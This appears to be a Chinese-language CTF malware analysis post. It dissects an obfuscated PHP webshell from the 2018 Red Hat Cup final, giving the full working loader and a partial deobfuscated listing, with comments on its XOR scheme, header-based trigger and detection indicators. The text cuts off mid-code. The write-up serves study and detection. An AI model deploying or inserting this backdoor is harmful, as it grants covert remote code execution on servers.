开始前的例行叨叨:
这个后门样本收集于 2018 红帽杯线下决赛；看到有其他分析文章是从自己的服务器上收集到的，悲剧了（手动笑哭），貌似蓝帽杯也出现过。
调试了很久,被逼着专门学了半天正则表达式,但感觉写完这篇文章就忘干净了。
这个马的特殊之处在于：它特别麻烦，会让你在现场心态崩溃、调试不出来；而且即使抓到了流量也不会打，直接重放过去也看不懂结果 6666
(手动滑稽)
后门源码
<?php
// Obfuscated loader. Every fragment below has junk "pw" tokens spliced into it;
// the str_replace on the line before the call strips them and concatenates the
// pieces into one PHP source string, which is then compiled and executed.
// Analyst note: the only fixed key material is in $W ("d6a6", "bc0d"); the
// decoded body builds the XOR key as $kh.$kf (see $U) and wraps its reply in
// <$k>...</$k> tags (see $O), which gives a fingerprint for response traffic.
$s='=0;pw($pwj<$c&&$ipw<$l);$jpw++pw,$i++){$opw.=$pwt{$i}^$k{$j}pw;}}repwpwturn pw$o;}$r=$_SERVEpwR;$pwpwrr=@$r["HpwTTP_REpwpwFE';
$I='m[2]pw[$z]];ipwf(strpopwspw($p,$h)pw===0){$s[$pwpwi]="";$pwppw=$ss($p,3);}if(apwrray_pwkey_existpws($i,$pws)){pw$s[$i].pw=$p;';
// $U: the reassembled payload is run via eval(gzuncompress(x(base64_decode(...)))).
$U='$epw=strppwpwos($s[$ipw],$f);ipwfpw($e){pw$k=$pwkpwh.$kf;ob_start();@evpwapwl(@gzuncpwpwompress(@x(@baspwepw64_decpwpwode(';
// "cpFreapFtepFpF_pFfuncpFtion" with "pF" removed is the string "create_function".
$d=str_replace('pF','','cpFreapFtepFpF_pFfuncpFtion');
$Q='preg_replapwce(arrapwypwpw("/_/","/-/"),array("pw/"pw,"+"),pwpw$ss($s[pw$i],0pw,$e))),$k)));pw$opw=ob_gepwt_pwcopwpwntents();o';
// $O: captured output is gzcompress()ed, XORed with x(), base64-encoded and printed
// between <$k> and </$k>, then the session is destroyed.
$O='b_end_clean(pw);$d=bpwase64pw_epwncode(x(gzcompwpress($opw),$pwk));pripwntpw("<$kpw>$d</$k>");@sespwpwspwion_destroy();}}}}';
// $s/$y: the trigger inputs are the HTTP_REFERER and HTTP_ACCEPT_LANGUAGE headers,
// not a request parameter, so parameter-based WAF rules will not see the command.
$y='RERpwpw"];$ra=@$r["HTTP_ACCEPTpwpw_LANGUAGE"];pwifpw(pw$rr&&$ra)pw{$u=parsepw_urlpw($rr);parspwe_str($upw["qpwupwery"],$q);';
$X='$q=pwapwrray_values(pwpw$q);preg_mpwatchpw_alpwl("/([\\w])[pw\\wpw-]+(?:;q=0.(pw[pw\\d]))?,?/pw",$rpwpwa,$m);pwif($q&&$m){@';
$b='sespwsion_stapwrt();$pwspw=&$_SESpwSpwION;$pwss="spwubpwstr";$sl="pwstrtolopwwer";$i=$m[1][0]pwpw.$m[1][1];pw$h=$sl(pwpw$s';
$q='pws(md5($i.$kh)pw,0,3));$fpwpw=$pwsl($ss(md5($i.$kfpw),0pwpw,3));$p="pw";fopwr($zpw=1;$z<count($m[1pwpw]);$pwz++)$p.=$pwq[$';
$W='$kh="d6a6";pw$kf=pw"bc0d";pwfupwnction x($pwt,$pwkpw){$c=spwtrlen($k);$l=pwpwstrlen($t);pwpw$o="pw";for($i=0pw;$i<$l;){fopwr($j';
// Reassembly order is $W.$s.$y.$X.$b.$q.$I.$U.$Q.$O — not declaration order.
// Stripping "pw" here yields the source shown in the deobfuscated listing.
$j=str_replace('pw','',$W.$s.$y.$X.$b.$q.$I.$U.$Q.$O);
// create_function('', $j) compiles $j into an anonymous function and $u() runs it.
// create_function was deprecated in PHP 7.2 and removed in PHP 8.0, so this loader
// only executes on PHP <= 7.x — relevant when picking a sandbox to trace it in.
// Detection: a dynamic call whose callee name is built by str_replace, together with
// the HTTP_REFERER / HTTP_ACCEPT_LANGUAGE / $_SESSION / eval strings in the fragments.
$u=$d('',$j);$u();
?>
经过Debug调试,解混淆
解混淆后的源码
<?php
// Two hard-coded 4-hex-char fragments. The decoded body md5-hashes each together
// with the client-derived $i and keeps the first 3 lowercase hex chars: the $kh
// hash ($h) must appear at offset 0 of an incoming fragment, the $kf hash ($f) is
// the delimiter searched for before decoding. Their concatenation $kh.$kf is also
// the XOR key and the tag name around the reply. These literals are presumably
// generated per sample, so they are a usable file/traffic indicator for this one.
$kh = "d6a6";
$kf = "bc0d";
// Repeating-key XOR of $t with $k. The inner loop walks the key while advancing
// through $t; the outer loop restarts the key index, so byte i of $t is XORed with
// byte (i mod strlen($k)) of $k. Applying x() twice with the same key restores the
// input, which is why the sample uses the one function both to decode what it
// receives and to encode what it sends back.
function x($t, $k)
{
$c = strlen($k);
$l = strlen($t);
$o = "";
for ($i = 0; $i < $l; ) {
for ($j = 0; ($j < $c && $i < $l); $j++, $i++) {
// "$t{$i}" is the curly-brace string-offset syntax (equivalent to $t[$i]),
// deprecated in PHP 7.4 and removed in PHP 8.0 — the sample as written only
// runs on PHP 7.x, which matches the create_function() loader around it.
$o .= $t{$i} ^ $k{$j};
}
}
return $o;
}
$r = $_SERVER;
$rr = @$r["HTTP_REFERER"];
$ra = @$r["HTTP_ACCEPT_LANGUAGE"];
if ($rr && $ra) {
$u = parse_url($rr);
parse_str($u["query"], $q);
$q = array_values($q);
preg_match_all("/([\w])[\w-]+(?:;q=0.([\d]))?,?/", $ra, $m);
if ($q && $m) {
@session_start();
$s =& $_SESSION;
$ss = "substr";
$sl = "strtolower";
$i = $m[1][0] . $m[1][1];
$h = $sl($ss(md5($i . $kh), 0, 3));
$f = $sl($ss(md5($i . $kf), 0, 3));
$p = "";
for ($z = 1; $z < count($m[1]); $z++)
$p .= $q[$m[2][$z]];
if (strpos($p, $h) === 0) {
$s[$i] = "";
$p = $ss($p, 3);
}
if (array_key_exists($i, $s)) {
$s[$i] .= $p;
$e = strpos($s[$i], $f);
if ($e) {
$k